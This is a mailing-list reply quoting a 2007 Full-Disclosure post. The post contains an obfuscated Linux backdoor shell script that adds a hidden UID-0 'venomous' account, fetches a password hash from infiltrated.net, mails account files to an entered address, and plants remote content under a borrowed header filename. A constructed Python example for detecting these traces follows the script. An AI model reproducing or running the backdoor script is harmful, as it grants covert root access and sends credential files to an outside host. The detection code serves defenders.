Confirmed Mac OS X is not vulnerable to this.

just1n
--
NeXT is one of my best friends, Love & Sincerity
Mac OS X Evangelist
Public Relations of NeXus

> ----- Original Message -----
> From: "J. Oquendo" <[EMAIL PROTECTED]>
> To: "full-disclosure" <[email protected]>
> Subject: [Full-disclosure] Linux big bang theory....
> Date: Wed, 09 May 2007 17:42:52 -0400
>
> Enjoy||Complain
>
> # !/bin/sh
> # Venomous
> # Linux PoC backdoor keeper...
> # http://www.infiltrated.net/ubuntuDestruction.php
> # J. Oquendo (c) 05/09/2007
> # If you have to ask you shouldn't run
> this password for venomous
> # is password
>
>
> happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
> days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
> guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
> sed -n '1p' $happy|awk -F ":" 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days
> sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F ":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy
> what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
> who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ""){print $4" -a"}'`
> echo "Enter your email address" ; read ans ; where=$ans
> $who | $what $where
>
>
> # Ugly method to keep a root account Follows... For those not in the know...
> # Venomous was an idea made to prove a point, not give script kiddiots another
> # tool to be morons with. Instead of ruining things, how about solving...
> # Instead of naysaying... Prove me wrong
>
>
> # Pick a ranDumb file in /usr/includes/ then create the same backdoor on the
> # system using this filename. Do something sneaky on your own to place this
> # file on a startup I could show you, but then I would have to kill -9 you
>
> # Note the location... Highly doubtable to remove an actual include file
> # unless some stupid admin did something really dumb... Before someone mouths
> # around via e-mail... I could have written this all inclusively but I chose
> # not to for obvious reasons...
>
> random=`date|awk -F : '{print $3}'|awk '{print $1}'`
> echo $random > /tmp/secCommand
> sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' /tmp/secCommand|sed -n '1p'`
> rm /tmp/secCommand
> filename=`echo $sad|sh|awk -F . '{print $1}'`
>
> lynx -dump http://www.infiltrated.net/ubuntuDestruction.php|sed -n '226,233p' >> /usr/local/include/$filename.h
>
> # Now of course I could have modified this to replicate any one of the files
> # on startup but again... PoC ... The naysayers will ramble on about "You're
> # out of your mind..." Am I? I've given you the PoC's what more do you want...
> # Ubuntu or any Linux for the lowly home user is a horrible idea...
>
> # And AGAIN before someone fires off "I would see the URL and that's a dead
> # giveaway!" ... Look, I'm trying to make a point here... I "could have"
> # a functioning backdoor undetectable to most integrity checkers, Samhain,
> # Tripwire etc., but why should I disclose this anywhere. It's not in the
> # best interest of anyone to do so... Don't bother asking for it via email
> # because it's not public and will never be...
>
> # This again... Was to prove a point to the naysayers who this shit doesn't
> # happen... Keep dreaming. It's only a matter of time before you guys go
> # Goo Goo about getting Linux for Idjits off the ground, but it's a horrible
> # mistake in the making
>
>
> --
> ====================================================
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> echo infiltrated.net|sed 's/^/sil@/g'
>
> "Wise men talk because they have something to say;
> fools, because they have to say something." -- Plato
>
> << smime.p7s >>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
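The quoted PoC leaves two artefacts an administrator can look for: a second UID-0 entry appended to the account files (the first line of the passwd file copied with the name swapped to "venomous") and a header file dropped into /usr/local/include under a name borrowed from /usr/include. The checks below are an added example, not code from the thread or from J. Oquendo; the function names, the sample passwd text and the baseline/current directory listings are all constructed for illustration.

```python
# Added example (not code from the thread or from J. Oquendo): detection
# checks for the two side effects the quoted PoC leaves behind, a second
# UID-0 entry appended to the account files and an unexpected header file
# dropped into /usr/local/include. All sample data is constructed inline.

from typing import Dict, List, Set

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")

# Constructed sample: three legitimate entries plus one rogue entry of the
# shape the quoted script produces (first line copied, name swapped).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
venomous:x:0:0:root:/root:/bin/bash
"""

# Constructed baseline (recorded on a known-good system) and current
# listings of /usr/local/include.
BASELINE_INCLUDES = {"mylib.h"}
CURRENT_INCLUDES = {"mylib.h", "sysexits.h"}


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Parse passwd-format text. Lines with the wrong field count are kept
    under a 'malformed' key so an audit reports them instead of hiding them."""
    entries: List[Dict[str, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != len(PASSWD_FIELDS):
            entries.append({"malformed": line, "line": str(lineno)})
            continue
        entry = dict(zip(PASSWD_FIELDS, parts))
        entry["line"] = str(lineno)
        entries.append(entry)
    return entries


def extra_uid0_accounts(text: str) -> List[str]:
    """Names of every UID-0 account other than root, in file order."""
    return [e["name"] for e in parse_passwd(text)
            if e.get("uid") == "0" and e.get("name") != "root"]


def duplicate_uids(text: str) -> Dict[str, List[str]]:
    """UIDs shared by more than one account, mapped to the account names."""
    by_uid: Dict[str, List[str]] = {}
    for e in parse_passwd(text):
        if "uid" in e:
            by_uid.setdefault(e["uid"], []).append(e["name"])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def malformed_lines(text: str) -> List[str]:
    """Raw text of every line that did not parse as a passwd entry."""
    return [e["malformed"] for e in parse_passwd(text) if "malformed" in e]


def unexpected_files(baseline: Set[str], current: Set[str]) -> List[str]:
    """Files present now but absent from the recorded baseline, sorted."""
    return sorted(current - baseline)


if __name__ == "__main__":
    print("extra UID-0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
    print("shared UIDs:", duplicate_uids(SAMPLE_PASSWD))
    print("malformed lines:", malformed_lines(SAMPLE_PASSWD))
    print("new files in /usr/local/include:",
          unexpected_files(BASELINE_INCLUDES, CURRENT_INCLUDES))
```

On a real host the same functions take `open("/etc/passwd").read()` and `set(os.listdir("/usr/local/include"))`; the name check applies equally to the shadow file, since the script appends a hashed-password line for the rogue name there too. The directory baseline only means something if it was recorded before the system was exposed, which is the same limitation the quoted message raises against file integrity checkers.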
